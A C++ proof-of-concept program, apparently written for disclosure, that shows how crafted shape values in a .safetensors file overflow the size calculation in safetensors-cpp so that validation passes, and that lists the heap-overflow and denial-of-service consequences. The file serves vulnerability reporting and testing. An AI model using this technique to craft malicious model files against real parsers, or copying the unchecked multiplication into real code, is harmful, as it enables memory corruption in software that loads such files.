File size: 6,128 Bytes
4c19aea | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 | /**
* test_overflow.cc - Demonstrates integer overflow vulnerability in safetensors-cpp
*
* This program loads a malicious .safetensors file where shape dimensions
* are crafted to overflow uint64 multiplication in get_shape_size().
*
* The file passes safetensors-cpp validation because:
* shape = [4194305, 4194305, 211106198978564]
* get_shape_size() = 4194305 * 4194305 * 211106198978564 (overflows to 4)
* tensor_size = 4 * sizeof(F32) = 16 bytes
* data_offsets = [0, 16] -> data_size = 16 bytes
* tensor_size == data_size -> VALIDATION PASSES
*
* But the declared shape claims ~3.7 * 10^27 elements.
*
* IMPACT: Any code that trusts the shape for buffer allocation or iteration
* will either:
* (a) Attempt a massive allocation (DoS / OOM)
* (b) If they also overflow, allocate a tiny buffer and write OOB (heap overflow)
* (c) Iterate over wrong number of elements, causing OOB reads
*
* Compile: g++ -std=c++17 -I safetensors-cpp -o test_overflow test_overflow.cc
*/
#include <cstdio>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <fstream>
#include <vector>
#include <iostream>
#include <limits>
#include "safetensors.hh"
int main(int argc, char *argv[]) {
const char *filepath = "overflow_tensor.safetensors";
if (argc > 1) {
filepath = argv[1];
}
printf("=== safetensors-cpp Integer Overflow PoC ===\n\n");
// Read file into memory
std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
if (!ifs.is_open()) {
fprintf(stderr, "Failed to open %s\n", filepath);
return 1;
}
size_t filesize = ifs.tellg();
ifs.seekg(0);
std::vector<uint8_t> data(filesize);
ifs.read(reinterpret_cast<char*>(data.data()), filesize);
ifs.close();
printf("[*] Loaded file: %s (%zu bytes)\n", filepath, filesize);
// Parse with safetensors-cpp
safetensors::safetensors_t st;
std::string warn, err;
bool ok = safetensors::load_from_memory(data.data(), data.size(),
filepath, &st, &warn, &err);
if (!ok) {
printf("[!] load_from_memory FAILED: %s\n", err.c_str());
return 1;
}
if (!warn.empty()) {
printf("[!] Warnings: %s\n", warn.c_str());
}
printf("[+] load_from_memory SUCCEEDED (file parsed without error)\n\n");
// Validate data offsets (this is the check that should catch overflow)
std::string val_err;
bool valid = safetensors::validate_data_offsets(st, val_err);
printf("[*] validate_data_offsets: %s\n", valid ? "PASSED" : "FAILED");
if (!valid) {
printf(" Error: %s\n", val_err.c_str());
}
// Examine the tensor
for (size_t i = 0; i < st.tensors.size(); i++) {
std::string key = st.tensors.keys()[i];
safetensors::tensor_t tensor;
st.tensors.at(i, &tensor);
printf("\n[*] Tensor: '%s'\n", key.c_str());
printf(" dtype: F32\n");
printf(" shape: [");
for (size_t j = 0; j < tensor.shape.size(); j++) {
if (j > 0) printf(", ");
printf("%zu", tensor.shape[j]);
}
printf("]\n");
printf(" data_offsets: [%zu, %zu]\n", tensor.data_offsets[0], tensor.data_offsets[1]);
// Show the overflow
size_t shape_size = safetensors::get_shape_size(tensor);
size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);
size_t tensor_size = dtype_bytes * shape_size;
printf("\n [OVERFLOW ANALYSIS]\n");
printf(" get_shape_size() = %zu (OVERFLOWED! True value: ~3.7e27)\n", shape_size);
printf(" get_dtype_bytes() = %zu\n", dtype_bytes);
printf(" tensor_size = %zu * %zu = %zu\n", dtype_bytes, shape_size, tensor_size);
printf(" data_size = %zu\n", tensor.data_offsets[1] - tensor.data_offsets[0]);
printf(" tensor_size == data_size? %s\n",
tensor_size == (tensor.data_offsets[1] - tensor.data_offsets[0]) ? "YES (validation passes!)" : "NO");
// Demonstrate the danger: a naive consumer trusting shape
printf("\n [IMPACT DEMONSTRATION]\n");
printf(" A consumer that trusts shape dimensions would compute:\n");
printf(" shape[0] * shape[1] * shape[2] = ");
// Use __int128 or manual check to show the true product
__uint128_t true_product = (__uint128_t)tensor.shape[0] * tensor.shape[1] * tensor.shape[2];
printf("OVERFLOW (too large for uint64)\n");
printf(" True product > UINT64_MAX: %s\n",
true_product > ((__uint128_t)UINT64_MAX) ? "YES" : "NO");
// Simulate what a consumer would do
printf("\n [SIMULATED CONSUMER BEHAVIOR]\n");
// Scenario 1: Consumer uses shape for allocation (overflows to small buffer)
size_t alloc_size = 1;
for (size_t j = 0; j < tensor.shape.size(); j++) {
alloc_size *= tensor.shape[j]; // Same overflow!
}
alloc_size *= dtype_bytes;
printf(" Consumer alloc (overflowed): %zu bytes (tiny!)\n", alloc_size);
printf(" Consumer thinks tensor has: %zu * %zu * %zu = ~3.7e27 elements\n",
tensor.shape[0], tensor.shape[1], tensor.shape[2]);
// Show it: allocate the overflowed-size buffer, then show what happens
// when iterating over shape dimensions
printf("\n If consumer allocates %zu bytes but iterates shape[0]*shape[1]*shape[2] times:\n", alloc_size);
printf(" -> HEAP BUFFER OVERFLOW (writing ~3.7e27 * 4 bytes into %zu byte buffer)\n", alloc_size);
printf(" This is a critical memory safety vulnerability.\n");
}
printf("\n=== DIFFERENTIAL RESULT ===\n");
printf(" Rust (reference): REJECTS file with SafeTensorError::ValidationOverflow\n");
printf(" C++ (safetensors-cpp): ACCEPTS file, validation passes\n");
printf(" Impact: A model file that Rust deems invalid is accepted by C++\n");
printf(" The shape values cause integer overflow, enabling heap corruption\n");
return 0;
}
|